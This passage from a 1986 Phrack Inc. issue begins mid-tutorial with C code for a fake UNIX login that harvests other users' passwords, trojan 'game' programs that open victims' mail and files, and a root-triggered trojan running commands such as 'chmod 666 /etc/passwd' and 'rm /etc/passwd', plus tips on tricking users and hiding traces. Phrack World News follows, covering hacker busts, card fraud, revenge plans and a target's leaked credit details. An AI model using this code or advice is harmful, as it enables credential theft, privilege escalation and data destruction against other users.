  756. force hack (most UNIX systems don't hang up after x number of login
  757. tries, and there are a number of default logins, such as root, bin,
  758. sys and uucp).  Once you're in the system, you can easily bring
  759. it to its knees (see my previous Phrack article, "UNIX Nasty Tricks")
  760. or, if you know a little 'C', you can make the system work for you
  761. and totally eliminate the security barriers to creating your own
  762. logins, reading anybody's files, etcetera.  This file will outline
  763. such ways by presenting 'C' code that you can implement yourself.
  764.  
  765. Requirements
  766. ------------
  767.      You'll need a working account on a UNIX system.  It should be
  768. a fairly robust version of UNIX (such as 4.2bsd or AT&T System V)
  769. running on a real machine (a PDP/11, VAX, Pyramid, etc.) for the
  770. best results.  If you go to school and have an account on the school
  771. system, that will do perfectly.
  772.  
  773. Notes
  774. -----
  775.      This file was inspired an article in the April, '86 issue of
  776. BYTE entitled "Making UNIX Secure."  In the article, the authors say
  777. "We provide this information in a way that, we hope, is interesting and
  778. useful yet stops short of being a 'cookbook for crackers.'  We have
  779. often intentionally omitted details."  I am following the general
  780. outline of the article, giving explicit examples of the methods they touched
  781. on.
  782.  
  783.      An unrelated note:  Somewhere there's a dude running around using
  784. the handle "Lord British" (not THE Lord British...).  This is a message
  785. for LB:  "Fuck off and die."
  786.  
  787. Here we go...
  788.  
  789. Project One:  Fishing For Passwords
  790. -----------------------------------
  791.  
  792.      You can implement this with only a minimal knowledge of UNIX and
  793. C.  However, you need access to a terminal that many people use -
  794. the computer lab at your school, for example.
  795.  
  796.      When you log onto a typical UNIX system, you see something like this:
  797.  
  798. Tiburon Systems 4.2bsd / System V (shark)
  799.  
  800.  
  801. login: shark
  802. Password:      (not printed)
  803.  
  804.      The program I'm giving you here simulates a logon sequence.  You
  805. run the program from a terminal and then leave.  Some unknowing fool
  806. will walk up and enter their login and password.  It is written to a
  807. file of yours, then "login incorrect" is printed, then the fool is
  808. asked to log in again.  The second time it's the real login program.
  809. This time the person succeeds and they are none the wiser.
  810.  
  811.      On the system, put the following code into a file called 'horse.c'.
  812. You will need to modify the first 8 lines to fit your system's appearance.
  813.  
  814.  
  815. ----- Code Begins Here -----
  816.  
  817. /* this is what a 'C' comment looks like.  You can leave them out. */
  818.  
  819. /* define's are like macros you can use for configuration. */
  820.  
  821. define SYSTEM "\n\nTiburon Systems 4.2bsd UNIX (shark)\n\n"
  822.  
  823. /* The above string should be made to look like the message that your
  824.  * system prints when ready.  Each \n represents a carriage return.
  825.  */
  826.  
  827. define LOGIN  "login: "
  828.  
  829. /* The above is the login prompt.  You shouldn't have to change it
  830.  * unless you're running some strange version of UNIX.
  831.  */
  832.  
  833. define PASSWORD "password:"
  834.  
  835. /* The above is the password prompt.  You shouldn't have to change
  836.  * it, either.
  837.  */
  838.  
  839. define WAIT 2
  840.  
  841. /* The numerical value assigned to WAIT is the delay you get after
  842.  * "password:" and before "login incorrect."  Change it (0 = almost
  843.  * no delay, 5 = LONG delay) so it looks like your system's delay.
  844.  * realism is the key here - we don't want our target to become
  845.  * suspicious.
  846.  */
  847.  
  848.  
  849. define INCORRECT "Login incorrect.\n"
  850.  
  851. /* Change the above so it is what your system says when an incorrect
  852.  * login is given.  You shouldn't have to change it.
  853.  */
  854.  
  855. define FILENAME "stuff"
  856.  
  857. /* FILENAME is the name of the file that the hacked passwords will
  858.  * be put into automatically.  'stuff' is a perfectly good name.
  859.  */
  860.  
  861. /* Don't change the rest of the program unless there is a need to
  862.  * and you know 'C'.
  863.  */
  864.  
  865. include <curses.h>
  866. include <signal.h>
  867. int stop();
  868.  
  869. main()
  870. {
  871. char name[10], password[10];
  872. int i;
  873. FILE *fp, *fopen();
  874. signal(SIGINT,stop);
  875. initscr();
  876. printf(SYSTEM);
  877. printf(LOGIN);
  878. scanf("%[^\n]",name);
  879. getchar();
  880. noecho();
  881. printf(PASSWORD);
  882. scanf("%[^\n]",password);
  883. printf("\n");
  884. getchar();
  885. echo();
  886. sleep(WAIT);
  887.  
  888.  
  889. if ( ( fp = fopen(FILENAME,"a") )  != NULL ) {
  890. fprintf(fp,"login %s has password %s\n",name,password);
  891. fclose(fp);
  892. }
  893.  
  894. printf(INCORRECT);
  895. endwin();
  896. }
  897.  
  898. stop()
  899. {
  900. endwin();
  901. exit(0);
  902. }
  903.  
  904.  
  905. ----- Source Ends Here -----
  906.  
  907.      OK, as I said, enter the above and configure it so it looks exactly
  908. like your system's login sequence.  To compile this program called
  909. 'horse.c' type the following two lines: (don't type the %'s, they are
  910. just a sample prompt)
  911.  
  912. % cc horse.c -lcurses -ltermcap
  913. % mv a.out horse
  914.  
  915. You now have the working object code in a file called 'horse'.  Run it,
  916. and if it doesn't look like your systems logon sequence, re-edit horse.c
  917. and re-compile it.  When you're ready to put the program into use, create
  918. a new file and call it 'trap' or something.  'trap' should have these two
  919. commands:
  920.  
  921. horse                    (this runs your program)
  922. login                    (this runs the real login program)
  923.  
  924. to execute 'trap' type:
  925.  
  926. % source trap            (again, don't type the %)
  927.  
  928. and walk away from your terminal...
  929.  
  930. After you've run it successfully a few times, check your file called
  931. 'stuff' (or whatever you decided to call it).  It will look like this:
  932.  
  933. user john has password secret
  934. user mary has password smegma
  935. etc.
  936.  
  937. Copy down these passwords, then delete this file (it can be VERY
  938. incriminating if the superuser sees it).
  939.  
  940. Note - for best results your terminal should be set to time-out after
  941. a few minutes of non-use - that way, your horse program doesn't
  942. run idle for 14 hours if nobody uses the terminal you ran it on.
  943.  
  944. -----
  945.  
  946. The next projects can be run on a remote system, such as the VAX in
  947. Michigan you've hacked into, or Dartmouth's UNIX system, or whatever.
  948. However, they require a little knowledge of the 'C' language.  They're
  949. not something for UNIX novices.
  950.  
  951. Project Two:  Reading Anybody's Files
  952. -------------------------------------
  953.  
  954. When somebody runs a program, they're the owner of the process created
  955. and that program can do anything they would do, such as delete a file
  956. in their directory or making a file of theirs available for reading
  957. by anybody.
  958.  
  959. When people save old mail they get on a UNIX system, it's put into
  960. a file called mbox in their home directory.  This file can be fun
  961. to read but is usually impossible for anybody but the file's owner
  962. to read.  Here is a short program that will unlock (i.e. chmod 777,
  963. or let anybody on the system read, write or execute) the mbox file
  964. of the person who runs the program:
  965.  
  966. ----- Code Begins Here -----
  967.  
  968. include <pwd.h>
  969.  
  970. struct passwd *getpwnam(name);
  971. struct passwd *p;
  972. char buf[255];
  973.  
  974. main()
  975. {
  976. p = getpwnam(getlogin());
  977. sprintf(buf,"%s/%s",p->pw_dir,"mbox");
  978. if ( access(buf,0) > -1 ) {
  979.         sprintf(buf,"chmod 777 %s/%s",p->pw_dir,"mbox");
  980.         system(buf);
  981.         }
  982. }
  983.  
  984. ----- Code Ends Here -----
  985.  
  986. So the question is:  How do I get my target to run this program that's
  987. in my directory?
  988.  
  989. If the system you're on has a public-messages type of thing (on
  990. 4.xbsd, type 'msgs') you can advertise your program there.  Put the
  991. above code in another program - find a utility or game program in
  992. some magazine like UNIX WORLD and modify it and do the above before
  993. it does it's real thing.  So if you have a program called tic-tac-toe
  994. and you've modified it to unlock the mbox file of the user before it
  995. plays tic-tac-toe with him, advertise "I have a new tic-tac-toe program
  996. running that you should all try.  It's in my directory." or whatever.
  997. If you don't have means of telling everybody on the system via a public
  998. message, then just send mail to the specific people you want to trap.
  999.  
  1000. If you can't find a real program to modify, just take the above program
  1001. and add this line between the two '}' lines at the end of the program:
  1002.  
  1003. printf("Error opening tic-tac-toe data file.  Sorry!\n");
  1004.  
  1005. when the program runs, it will print the above error message.  The user
  1006. will think "Heh, that dude doesn't know how to write a simple tic-tac-
  1007. toe program!" but the joke's on him - you can now read his mail.
  1008.  
  1009. If there's a specific file in a user's directory that you'd like to
  1010. read (say it's called "secret") just throw together this general
  1011. program:
  1012.  
  1013.  
  1014. main()
  1015. {
  1016. if ( access("secret",0) > -1 ) system("chmod 777 secret");
  1017. }
  1018.  
  1019. then 'talk' or 'write' to him and act like Joe Loser: "I wrote this program
  1020. called super_star_wars, will you try it out?"
  1021.  
  1022. You can use your imagination.  Think of a command you'd like somebody
  1023. to execute.  Then put it inside a system() call in a C program and
  1024. trick them into running your program!
  1025.  
  1026. Here's a very neat way of using the above technique:
  1027.  
  1028. Project Three: Become the superuser
  1029. -----------------------------------
  1030.  
  1031. Write a program that you can get people to run.  Put this line in
  1032. it somewhere:
  1033.  
  1034. if ( !strcmp(getlogin(),"root") ) system("whatever you want");
  1035.  
  1036. This checks to see if the root login is running your program.  If
  1037. he is, you can have him execute any shell command you'd like.
  1038. Here are some suggestions:
  1039.  
  1040. "chmod 666 /etc/passwd"
  1041.  
  1042.      /etc/passwd is the system's password file.  The root owns this
  1043. file.  Normally, everyone can read it (the passwords are encrypted)
  1044. but only the root can write to it.  Take a look at it and see how it's
  1045. formatted if you don't know already.  This command makes it possible
  1046. for you to now write to the file - i.e. create unlimited accounts for
  1047. yourself and your friends.
  1048.  
  1049. "chmod 666 /etc/group"
  1050.  
  1051.      By adding yourself to some high-access groups, you can open many
  1052. doors.
  1053.  
  1054. "chmod 666 /usr/lib/uucp/L.sys"
  1055.  
  1056.      Look for this file on your system if it is on the uucp net.  It
  1057. contains dialups and passwords to other systems on the net, and normally
  1058. only the uucp administrator can read it.  Find out who owns this file
  1059. and get him to unknowingly execute a program to unlock it for you.
  1060.  
  1061. "rm /etc/passwd"
  1062.  
  1063.      If you can get the root to execute this command, the system's
  1064. passwd file will be removed and the system will go down and will
  1065. not come up for some time to come.  This is very destructive.
  1066.  
  1067. -----
  1068.  
  1069. If you are going to go about adding a trojan horse program to the
  1070. system, there are some rules you should follow.  If the hidden purpose
  1071. is something major (such as unlocking the user's mbox or deleting all
  1072. of his files or something) this program shouldn't be a program that
  1073. people will be running a lot (such as a popular computer game) - once
  1074. people discover that their files are public access the source of the
  1075. problem will be discovered quite easily.  Save this purpose for a 'test'
  1076. program (such as a game you're in the process of writing) that you
  1077. ask individual people to run via mail or 'chatting' with them.  As I
  1078. said, this 'test' program can bomb or print a phony error message after
  1079. completing its task, and you will just tell the person "well, I guess
  1080. it needs more work", wait until they log off, and then read whatever
  1081. file of theirs that you've unlocked.  If your trojan horse program's
  1082. sole purpose is to catch a specific user running it - such as the
  1083. root or other high-powered user - you can put the code to do so
  1084. in a program that will be run a lot by various users of the system.
  1085. Your modification will remain dormant until he runs it.
  1086. If you can't find the source to 'star trek' or whatever in C, just
  1087. learn C and convert something from pascal.  It can't hurt to learn
  1088. C as it's a great language.  We've just seen what it can do on a
  1089. UNIX system.  Once you've caught the root (i.e. you can now modify
  1090. the /etc/passwd file) remove the spurious code from your trojan horse
  1091. program and you'll never be caught.
  1092.  
  1093. That's it...if you have any questions or comments or you just want
  1094. to bitch at me, call this system:
  1095.  
  1096. The Matrix
  1097. 415/922-2008
  1098. 101 megs, IBM warezzz, 2400 baud, Phrack sub-board, etc.
  1099.  
  1100. Lord British, I *dare* you to call.
  1101.  
  1102. (>
  1103. =========================================================================
  1104.  
  1105.                                ==Phrack Inc.==
  1106.  
  1107.                     Volume One, Issue 7, Phile 8 of 10
  1108.  
  1109. PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  1110. PWN                                                                         PWN
  1111. PWN                      *^=-> Phrack World News <-=^*                      PWN
  1112. PWN                                                                         PWN
  1113. PWN                             Issue VI/Part 1                             PWN
  1114. PWN                                                                         PWN
  1115. PWN                         Compiled and Written by                         PWN
  1116. PWN                                                                         PWN
  1117. PWN                            Knight Lightning                             PWN
  1118. PWN                                                                         PWN
  1119. PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  1120.  
  1121. Oryan QUEST Vs. Dan Pasquale                                      June 21, 1986
  1122. ----------------------------
  1123. Yes, our buddy from the west coast is back in action, this time against Oryan
  1124. QUEST.  Oryan QUEST was busted on April 6, 1986 (See PWN Issue IV Part 2), for
  1125. hacking AT&T Mail, by the San Mateo Police Department and the FBI.  Because of
  1126. legal technicalities, the charges were dropped but, Oryan's computer was
  1127. confiscated and never returned.  He has since bought a new computer (IBM AT)
  1128. and is now back among us.
  1129.  
  1130. It is believed that someone (Dan Pasquale?) must have found Oryan's notebook
  1131. which contained his passwords on to bulletin boards around the country.  One
  1132. example of this is "The Radio Station Incident" (See PWN Issue IV Part 3) where
  1133. a fake Oryan QUEST wandered the BBS and when questioned as to his legitimacy
  1134. quickly dropped carrier.
  1135.  
  1136. Most recently Oryan QUEST has been getting job offers in computer security.  He
  1137. hasn't accepted any at this time.  Also he has been getting several calls from
  1138. Dan Pasquale.  Dan wants Oryan's help to bust any and all hackers/phreaks.  Dan
  1139. is very pissed these days because someone charged $1100.00 worth of Alliance
  1140. Teleconferences to his phone bill and now he wants revenge.  He has stated that
  1141. one of his main projects is to bust P-80, sysoped by Scan Man.  Dan Pasquale
  1142. says that Scan Man works for a long distance communications carrier.  I
  1143. personally think he has as much of a chance of busting P-80 Systems as a
  1144. snowball staying frozen in a microwave.
  1145.  
  1146. Lets face it, if John Maxfield and the other investigators haven't busted P-80
  1147. yet, they never will...let alone some little police sergeant in California.
  1148. Dan also added that he is going to "hose" Speed Demon Elite.  He claims that he
  1149. is already a member of SDE and that its only a matter of time before he takes
  1150. it down forever.  He also mentioned that he has placed a Dialed Number Recorder
  1151. (DNR) on Radical Rocker's phone lines.   Furthermore, it was learned that Dan
  1152. Pasquale managed to get an account on to The Underground, sysoped by Night
  1153. Stalker.  It is unknown as to if Dan has anything to do with Night Stalker's
  1154. bust.
  1155.  
  1156. Dan Pasquale also said, "I will bust these hackers any way I can!"  To really
  1157. understand what that statement means you would probably have to live in
  1158. California.  What Pasquale was referring to was moving violations.  If you (a
  1159. driver under 21) receive any type of moving violation, both your insurance
  1160. company and your parents are notified.  This raises your insurance rates and
  1161. gets you into trouble.  If you get two moving violations, kiss your license
  1162. goodbye for at least 2 years.
  1163.  
  1164. Radical Rocker having heard about Dan Pasquale's plans to destroy Speed Demon
  1165. Elite, went on a user purge and has destroyed any and all accounts that were
  1166. held by those that he did not know personally.   Speed Demon Elite is now a
  1167. private BBS and supposedly Radical Rocker has now cleared things up with Dan
  1168. Pasquale.
  1169.             Information provided by Oryan QUEST and Radical Rocker
  1170. _______________________________________________________________________________
  1171.  
  1172. Marx and Tabas: The Full Story                                     July 1,1986
  1173. ------------------------------
  1174. It all started with Cory Andrew Lindsly aka Mark Tabas, age 19.  He worked for
  1175. the Colorado Plastic Card Company and had access to the plastic cards that
  1176. credit cards were made with.  He had taken 1350 and stashed them away for later
  1177. usage.
  1178.  
  1179. His plan would have went perfectly if not for Steve Dahl.  He was busted in
  1180. Miami by the US Secret Service for whatever reasons.  They gave him a chance to
  1181. play ball.  Dahl had heard about Mark Tabas and Karl Marx's scheme and after
  1182. informing the Secret Service about this he was given an embossing machine.
  1183. Steve Dahl then flew to Denver and set up the meeting.  Mark Tabas lived in
  1184. Denver and wanted his friend James Price Salsman aka Karl Marx, age 18, to join
  1185. in on the fun.  So Marx flew down on a carded plane ticket that Tabas had
  1186. signed for.
  1187.  
  1188. The meeting took place in a room at the Denver Inn.  The room was bugged and 19
  1189. cards (Visa, MasterCard, and some blanks) were made from a possible 140 that
  1190. they had brought.  They decided to celebrate by ordering champagne on the card
  1191. of Cecil R. Downing.
  1192.  
  1193. A member of the Secret Service actually delivered the champagne to the room
  1194. disguised as a waiter.  Tabas signed for the drinks and the twosome were
  1195. nailed.  To make matters worse the SS also matched Tabas's signature with the
  1196. signature used to buy the carded plane ticket.
  1197. -------------------------------------------------------------------------------
  1198. The sentencing goes like this:  Maximum: 10,000 dollars   (Local Law)
  1199.                                 Maximum: 250,000          (Federal Law)
  1200.                                 Maximum: 10 years in jail (both)
  1201.  
  1202.                        Or any combination of the three.
  1203.  
  1204. Both Tabas and Marx were let out on bail of five thousand dollars each.  The
  1205. actually charge is:  The manufacturing and possession of unauthorized access
  1206. devices.  The U.S. Magistrate Hilbert Schauer will be overhearing the case.
  1207.  
  1208. There is a rumor that charges on Salsman were dropped and that he is in no
  1209. trouble at all since he didn't actually buy the plane ticket, he was given it,
  1210. he didn't steal the cards, and he didn't emboss them.  So supposedly the Secret
  1211. Service let Marx go because he didn't know about the cards, he was just there
  1212. at the wrong time.
  1213.  
  1214.      Information Provided By The Denver Post and Sally Ride:::Space Cadet
  1215. _______________________________________________________________________________
  1216.  
  1217. The Saga Of Mad Hacker                                            July 15, 1986
  1218. ----------------------
  1219. Mad Hacker of 616 NPA 616 wrote a random Compuserve hacker because he was bored
  1220. and wanted something to do.  It ran constantly for about a week and was he
  1221. surprised when it came up with an account.  However he made the mistake of not
  1222. checking to see whose account it was, he used the SIG's (Special Interest
  1223. Group's) and ran up a bill slightly under $300.
  1224.  
  1225. About a month later he was living over at a friend's house and the owner of the
  1226. account showed up, who just happened to be a family friend of the people that
  1227. MH was staying with.  He asked both of them (the teenagers that is) if they
  1228. were using his account (they all had Compuserve accounts and the family knew
  1229. they were computer buddies).  Mad Hacker said no and truthfully meant it.
  1230.  
  1231. Now around July 1, 1986 the account owner turned the matter over to the
  1232. Kalamazoo Police Department since CIS (Compuserve) could not find anything out
  1233. beyond the dialup used to access the account.  The police called around to
  1234. everyone in the area ("everyone" meaning all the "real" hacks and phreaks, not
  1235. rodents who think they're bad because they use handles) including Thomas
  1236. Covenant and Double Helix.  Most of everyone instantly forgot that Mad Hacker
  1237. ever existed, but somehow they got a hold of the phone number where he was
  1238. staying (at the time he was staying at his girlfriend's house, he was not
  1239. living there before) and contacted the owner of the account and put out a
  1240. warrant for Mad Hacker's arrest.
  1241.  
  1242. As of now, Mad Hacker faces *FELONY* charges because of the large amount of the
  1243. bill.  The warrant for his arrest has been suspended, letting the account owner
  1244. to handle things in his own way.  The owner has confiscated all of Mad Hacker's
  1245. computer equipment (3 computers and hardware etc.) until the bill is completely
  1246. paid back.
  1247.  
  1248. Mad Hacker has progressed from merely delivering clever obscenities over the
  1249. fone to his adversary to actual vengeance.  One example in the planning stages
  1250. will be in the form of camping out in said account owner backyard (in a rural
  1251. area), hooking up to a junction box, and running the account owner's Long
  1252. Distance phone bill out of sight.
  1253.  
  1254. Mad Hacker is supposed to have a file on Junction Box Modeming coming soon, he
  1255. is currently borrowing a computer from a friend.
  1256.  
  1257.                     Information Provided by Thomas Covenant
  1258. _______________________________________________________________________________
  1259.  
  1260. Lock Lifter *Busted*                                               July 2, 1986
  1261. --------------------
  1262. Lock Lifter was busted for hacking an MCI Vax.  he had downloaded a list of MCI
  1263. Calling Cards that he later abused and in return he received a *free* DNR on
  1264. his line for about 3 months.  He was also given a scare from MCI Investigations
  1265. (for unknown reasons) previous to his visit from law enforcement officers and
  1266. as such his BBS, The Black Chamber, was deleted and the userfiles were
  1267. destroyed, so there really isn't much to worry about from the user's
  1268. standpoint.
  1269.  
  1270. Lock Lifter had been making plans to take his board down anyway, so being
  1271. without The Black Chamber is just an adjustment we would have had to make
  1272. eventually regardless of Lock Lifters bust.
  1273.  
  1274.                             Information Provided By
  1275.                  Arthur Dent/Cyclone II/Kerrang Khan/The Seker
  1276. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1277. Some notes from Cheap Shades:
  1278.  
  1279. "I was told by Arthur Dent that Lock Lifter did not have his computer anymore,
  1280. but someone using LL's password called my AE, Metal Shop AE (for which he had
  1281. lost his AE access but could still log on), and left me feedback in all caps
  1282. (not like LL would do) that said something like  PLEASE GIVE ME ACCESS TO THE
  1283. GO AE FUNCTION."  Arthur Dent has now confirmed that Lock Lifter did not make
  1284. the call in question and that there is definitely a fed or someone with Lock
  1285. Lifter's BBS passwords.  Sysops be warned.
  1286. _______________________________________________________________________________
  1287.  
  1288. Daniel Zigmond:  The Plot Thickens                                July 13, 1986
  1289. ----------------------------------
  1290. Daniel Zigmond appeared, for a short time, on Pirate-80.  Scan Man let him on
  1291. to make a statement and then shut him off the board.  It is now left to the
  1292. users to decide whether or not he should be allowed back on.
  1293.  
  1294.                     Information by Sally Ride:::Space Cadet
  1295.  
  1296. Some sources say that we are seeing "Whacko Cracko" syndrome, where the story
  1297. gets more and more bizarre as versions get modified.  Like TWCB, Zigmond
  1298. supposedly says one thing to one person and something different to the next,
  1299. depending on what he thinks they may want to hear.
  1300.  
  1301. The following information was found under in an anonymous post on an unspecific
  1302. bulletin board.  It would appear that someone performed a credit check on
  1303. Daniel Zigmond (with TRW) and came up with some very interesting results.
  1304.  
  1305. As many of you should know, TRW keeps records of all major transactions you
  1306. make, credit cards you have, house or car payments, bank accounts you own, your
  1307. job, and many other things.  Daniel Zigmond's TRW account is a little
  1308. different, it has been flagged and the information is not there.   What it does
  1309. show is that Daniel Zigmond holds the position of Staff Programmer at Carnegie
  1310. Mellon University, a technical school in Pittsburgh, Pennsylvania.  It also
  1311. shows that he was born in 1959 and although it would appear that he is 27,
  1312. Daniel claims to be 26.  TRW lists his only bank account as being at the
  1313. Pittsburgh National Bank.
  1314.  
  1315. What this would mean is that Zigmond has never owned a car, never rented a car,
  1316. never owned or rented a house, never had a credit card, never made any major
  1317. transactions, and has only one bank account.
  1318.  
  1319. During teleconferences on July 15th and 16th, several members of the PhoneLine
  1320. Phantoms and myself questioned Zigmond about his TRW account and several other
  1321. things.  Zigmond claims to know nothing about why his account is like this and
  1322. up till we brought up the fact that he worked at CMU, he had been telling
  1323. people that he was a reporter only.
  1324.  
  1325. As far as his reasons for needing codes, passwords, etc...  He says its so his
  1326. boss (whomever it will be) will believe the story.  Why shouldn't he believe
  1327. it?  Haven't there been enough articles on hackers and phreakers in the past?
  1328. Its been in the news very often and I'm sure that everyone remembers the
  1329. Richard Sandza articles, "Night of The Hackers" and "Revenge of The Hackers"
  1330. from Newsweek Magazine.
  1331.  
  1332. Most recently Daniel Zigmond has been speaking with several members of the Neon
  1333. Knights and he has obtained an account on the BBS World's Grave Elite, which is
  1334. sysoped by Sir Gamelord, the Vice-President of the P.H.I.R.M.
  1335.  
  1336. All hackers and phreaks are welcome to call him to be interviewed, although I
  1337. advise against it.  Please do not call up to rag on him because it is
  1338. pointless.  One example happened during the 2nd conference when someone called
  1339. on Danny's other line.  They said "did we wake you up?"  Danny said "no" and
  1340. then they hung up.
  1341.  
  1342.                     Information Provided By Daniel Zigmond
  1343. _______________________________________________________________________________
  1344.  
  1345. TeleComputist; Subscribe Now!                                     July 25, 1986
  1346. -----------------------------
  1347. From:  Forest Ranger and TeleComputist staff,
  1348. To:  You!
  1349.  
  1350. TeleComputist has had a very positive response up to this time and we have
  1351. received many requests for the free sample issue and now it is time to
  1352. subscribe.
  1353.  
  1354. For the sample free issue please self addressed stamped envelope with 39 cents
  1355. postage to: TeleComputist Newsletter P.O. Box 2003 Florissant, Mo. 63032
  1356.  
  1357. Also, please send subscriptions to the same address.  The subscription fee for
  1358. the newsletter will be twelve dollars a year, fifty cents for back issues.
  1359. This is a monthly circulation and we encourage letters.
  1360.  
  1361.                   Information Provided by Telecomputist Staff
  1362.  
  1363.                   Telecomputist Newsletter/BBS (314)921-7938
  1364.  
  1365. [KL's notes:  Both Taran King and I have seen the first issue and it is damn
  1366. good.  This is NOT a scam, we know the TeleComputist Staff personally and they
  1367. will NOT rip you off.  The newsletter itself is of fine quality both in its
  1368. print and content.  The sample issue was merely a shadow of the upcoming issues
  1369. and it will continue to get better as time goes on. It is definitely worth the
  1370. twelve dollars for the year subscription.]
  1371. _______________________________________________________________________________
  1372. 
  1373.  
  1374. =========================================================================
  1375.  
  1376.                                 ==Phrack Inc.==
  1377.  
  1378.                       Volume One, Issue 7, Phile 9 of 10
  1379.  
  1380. PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  1381. PWN                                                                         PWN
  1382. PWN                      *^=-> Phrack World News <-=^*                      PWN
  1383. PWN                                                                         PWN
  1384. PWN                             Issue VI/Part 2                             PWN
  1385. PWN                                                                         PWN
  1386. PWN                         Compiled and Written by                         PWN
  1387. PWN                                                                         PWN
  1388. PWN                            Knight Lightning                             PWN
  1389. PWN                                                                         PWN
  1390. PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  1391.  
  1392. U.S. Telecom Retiring Uninet                                       May 26, 1986
  1393. ----------------------------
  1394.                             "Uninet is coming down"
  1395.  
  1396. Reston, Va. - U.S. Telecom Data Communications Company, Uninet Packet Switching
  1397. Network will be retired as a result of the proposed merger of the company with
  1398. GTE Telenet Communications Corporation.
  1399.  
  1400. The move came to light last week as a joint transition study team completed a
  1401. plan detailing how the two companies will be merged.  The merger is a result of
  1402. a joint venture spawned by the two companies parents, GTE Corporation and
  1403. United Talecommunications Inc.
  1404.  
  1405. The packet switches and related equipment which make up Uninet will be sold
  1406. where possible, but a good deal of the equipment is likely to be discarded, a
  1407. spokesman for the joint venture said.
  1408.  
  1409. Under the plan, the capacity of GTE Telenet Packet Switching Network will be
  1410. increased to handle additional traffic resulting from transference of U.S.
  1411. Telecom customers to Telenet, according to the spokesman.
  1412.  
  1413. The study groups considered integrating Uninet and Telenet because the external
  1414. interfaces of each network are compatible but the internal protocols each
  1415. network uses for functions such as networks management are substantially
  1416. different and any attempt toward integration would require a massive
  1417. development effort, spokesman said.
  1418.  
  1419. Moving Uninet's traffic to Telenet is far cheaper.  Telenet currently supports
  1420. six times as much traffic as Uninet, which means Telenet's capacity must only
  1421. be incremented by one sixth.
  1422.  
  1423. Uninet will be phased out over a 120 day transition period, to begin when the
  1424. joint venture is approved.  The merger plan calls for all personnel of U.S.
  1425. Telecom and GTE Telenet to be offered jobs with U.S. Sprint (now called U.S.
  1426. Sprint, not Sprint/U.S. Telecom company since recent merger).  The new company
  1427. is headquartered in Reston, Virginia where GTE Telenet is currently
  1428. headquartered.  Submitted by Scan Man to Phrack Inc. From Communications Week,
  1429. May 26 Issue
  1430. _______________________________________________________________________________
  1431.  
  1432.                                  P-80 Newsfile
  1433.                                  -------------
  1434. Computer Crime Bill Amended                                        May 14, 1986
  1435. ----------------------------
  1436. After three years of Congressional hearings, the U.S. House of Representatives
  1437. is finally getting ready to act on a computer crime bill, but like everything
  1438. else in Congress many different people have input, and the focus and scope of
  1439. pending computer crime bills have changed in important ways during the past few
  1440. months.
  1441.  
  1442. When bills are altered significantly, they are often written as "clean bills"
  1443. and given new numbers.  Computer crime measures are changing so fast it is
  1444. difficult to keep track of them.
  1445.  
  1446. What started out as The Counterfeit Access Device and Computer Fraud Act (HR
  1447. 1001) became late last month The Computer Fraud and Abuse Act (HR 4562) which,
  1448. although it has retained the same title, is now dubbed HR 4718 following the
  1449. addition of some minor amendments.
  1450.  
  1451. The new bill, sponsored by Rep. William Hughes (D-N.J.), is very similar to the
  1452. old one, however, and would impose severe penalties for illegally accessing
  1453. government and financial computers and crack down on illegal computer bulletin
  1454. board systems.
  1455.  
  1456. For more information on HR 4718, check the menu for bills in the US House of
  1457. Representatives in the Legislation Database.
  1458.  
  1459.                     Information Provided by Cathryn Conroy
  1460. -------------------------------------------------------------------------------
  1461. House Committee Approves New Computer Crime Bill                   May 14, 1986
  1462. ------------------------------------------------
  1463. The House Judiciary Committee has approved and sent to the full House a new
  1464. computer crime bill that would impose severe penalties for illegally accessing
  1465. government and financial computers and crack down on illegal computer bulletin
  1466. board systems.
  1467.  
  1468. The bill (HR 4718), sponsored by Rep. William Hughes (D-N.J.), was passed by
  1469. voice vote with no objection. It is aimed at closing loopholes in existing law
  1470. and at helping to eliminate the "national malaise" of computer crime, Hughes
  1471. said.
  1472.  
  1473. The bill "will enable us to much more effectively deal with the emerging
  1474. computer criminal in our society," said Hughes, who chairs the House crime
  1475. subcommittee.
  1476.  
  1477. Rep. Bill McCollum (R-Fla.), the ranking Republican on the crime subcommittee,
  1478. added his support for the bill. He said it is time the nation began cracking
  1479. down on computer criminals.
  1480.  
  1481. "We demand privacy, yet we glorify those that break into computers," McCollum
  1482. said, citing films and television shows that have painted a sympathetic
  1483. portrait of computer criminals.
  1484.  
  1485. The committee agreed to a single amendment to the bill -- one that would extend
  1486. the list of computer systems protected by the measure to include those run by
  1487. the brokers and dealers regulated by the Securities and Exchange Commission.
  1488. McCollum, who sponsored the amendment, said the brokers and dealers provide
  1489. some of the same services as banks and should receive equal protection against
  1490. computer trespassers.
  1491.  
  1492. The bill was reported out unanimously from the crime subcommittee. Hughes said
  1493. an identical companion measure is moving through the Senate and that he expects
  1494. the bill will become law before the end of the 99th Congress in December.
  1495. Hughes and McCollum agreed that the bill will help eliminate another glaring
  1496. example of the failure of existing federal law to keep pace with technological
  1497. advances.
  1498.  
  1499. "For the most part," he said, "our laws are rooted in the concept of property
  1500. crimes, where someone trespasses into or steals another person's property.
  1501. "With computer crimes, the trespassing or theft is done electronically, not
  1502. physically," he added.  "Although the losses are often just as great or even
  1503. greater than property crime, our laws are not current enough to keep pace with
  1504. the changing technology used by the criminals."
  1505.  
  1506. Hughes was the author of the nation's first computer crime law in 1984. That
  1507. bill established a new federal crime for unauthorized access to classified
  1508. information in government computers and a misdemeanor for accessing any federal
  1509. computer or computer containing financial or credit information.  The new
  1510. measure would establish a:
  1511.  
  1512. -:- New felony for trespassing into federal interest computers, those run by or
  1513.     for the federal government, banks or states. Offenders would face five-year
  1514.     prison terms.
  1515.  
  1516. -:- Second felony for "maliciously trespassing" into a federal interest
  1517.     computer and causing more than $1,000 in damage.
  1518.  
  1519. -:- New category of federal misdemeanors involving the use of illegal BBSes to
  1520.     post private information, such as credit card data, phone account
  1521.     information and passwords.
  1522.  
  1523. "We need to establish clear guidelines for protecting the information stored in
  1524. computers and for cracking down on those who knowingly put computers to
  1525. criminal of malicious use," Hughes said.
  1526.  
  1527.                        Information Provided by J. S. Orr
  1528. -------------------------------------------------------------------------------
